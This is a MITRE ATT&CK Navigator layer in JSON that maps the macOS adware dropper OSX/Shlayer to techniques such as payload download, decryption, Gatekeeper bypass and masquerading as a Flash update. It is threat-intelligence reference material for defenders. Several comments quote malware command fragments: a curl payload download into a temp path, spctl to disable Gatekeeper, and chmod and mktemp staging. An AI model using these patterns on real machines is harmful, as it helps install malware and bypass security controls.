{"description": "Enterprise techniques used by OSX/Shlayer, ATT&CK software S0402 (v1.4)", "name": "OSX/Shlayer (S0402)", "domain": "enterprise-attack", "versions": {"layer": "4.5", "attack": "17", "navigator": "5.1.0"}, "techniques": [{"techniqueID": "T1548", "showSubtechniques": true}, {"techniqueID": "T1548.004", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) can escalate privileges to root by asking the user for credentials.(Citation: Carbon Black Shlayer Feb 2019)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1059", "showSubtechniques": true}, {"techniqueID": "T1059.004", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) can use bash scripts to check the macOS version, download payloads, and extract bytes from files. [OSX/Shlayer](https://attack.mitre.org/software/S0402) uses the command sh -c tail -c +1381... to extract bytes at an offset from a specified file. [OSX/Shlayer](https://attack.mitre.org/software/S0402) uses the curl -fsL \"$url\" >$tmp_path command to download malicious payloads into a temporary directory.(Citation: Carbon Black Shlayer Feb 2019)(Citation: sentinelone shlayer to zshlayer)(Citation: 20 macOS Common Tools and Techniques)(Citation: objectivesee osx.shlayer apple approved 2020)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1140", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) can base64-decode and AES-decrypt downloaded payloads.(Citation: Carbon Black Shlayer Feb 2019) Versions of [OSX/Shlayer](https://attack.mitre.org/software/S0402) pass encrypted and password-protected code to openssl and then write the payload to the /tmp folder.(Citation: sentinelone shlayer to zshlayer)(Citation: 20 macOS Common Tools and Techniques)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1083", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) has used the command appDir=\"$(dirname $(dirname \"$currentDir\"))\" and $(dirname \"$(pwd -P)\") to construct installation paths.(Citation: sentinelone shlayer to zshlayer)(Citation: 20 macOS Common Tools and Techniques)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1222", "showSubtechniques": true}, {"techniqueID": "T1222.002", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) can use the chmod utility to set a file as executable, such as chmod 777 or chmod +x.(Citation: 20 macOS Common Tools and Techniques)(Citation: Carbon Black Shlayer Feb 2019)(Citation: Shlayer jamf gatekeeper bypass 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1564", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) has used the mktemp utility to make random and unique filenames for payloads, such as export tmpDir=\"$(mktemp -d /tmp/XXXXXXXXXXXX)\" or mktemp -t Installer.(Citation: sentinelone shlayer to zshlayer)(Citation: 20 macOS Common Tools and Techniques)(Citation: Shlayer jamf gatekeeper bypass 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1564.001", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) has executed a .command script from a hidden directory in a mounted DMG.(Citation: Carbon Black Shlayer Feb 2019)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1564.009", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) has used a resource fork to hide a compressed binary file of itself from the terminal, Finder, and potentially evade traditional scanners.(Citation: tau bundlore erika noerenberg 2020)(Citation: sentinellabs resource named fork 2020)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1564.011", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) has used the `nohup` command to instruct executed payloads to ignore hangup signals.(Citation: Shlayer jamf gatekeeper bypass 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1105", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) can download payloads, and extract bytes from files. [OSX/Shlayer](https://attack.mitre.org/software/S0402) uses the curl -fsL \"$url\" >$tmp_path command to download malicious payloads into a temporary directory.(Citation: Carbon Black Shlayer Feb 2019)(Citation: sentinelone shlayer to zshlayer)(Citation: 20 macOS Common Tools and Techniques)(Citation: objectivesee osx.shlayer apple approved 2020)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1036", "showSubtechniques": true}, {"techniqueID": "T1036.005", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) can masquerade as a Flash Player update.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1176", "showSubtechniques": true}, {"techniqueID": "T1176.001", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) can install malicious Safari browser extensions to serve ads.(Citation: Intego Shlayer Apr 2018)(Citation: Malwarebytes Crossrider Apr 2018)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1553", "showSubtechniques": true}, {"techniqueID": "T1553.001", "comment": "If running with elevated privileges, [OSX/Shlayer](https://attack.mitre.org/software/S0402) has used the spctl command to disable Gatekeeper protection for a downloaded file. [OSX/Shlayer](https://attack.mitre.org/software/S0402) can also leverage system links pointing to bash scripts in the downloaded DMG file to bypass Gatekeeper, a flaw patched in macOS 11.3 and later versions. [OSX/Shlayer](https://attack.mitre.org/software/S0402) has been notarized by Apple, resulting in successful passing of additional Gatekeeper checks.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Shlayer jamf gatekeeper bypass 2021)(Citation: objectivesee osx.shlayer apple approved 2020)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1082", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) has collected the IOPlatformUUID, session UID, and the OS version using the command sw_vers -productVersion.(Citation: Carbon Black Shlayer Feb 2019)(Citation: sentinelone shlayer to zshlayer)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1204", "showSubtechniques": true}, {"techniqueID": "T1204.002", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) has relied on users mounting and executing a malicious DMG file.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}], "gradient": {"colors": ["#ffffff", "#66b1ff"], "minValue": 0, "maxValue": 1}, "legendItems": [{"label": "used by OSX/Shlayer", "color": "#66b1ff"}]}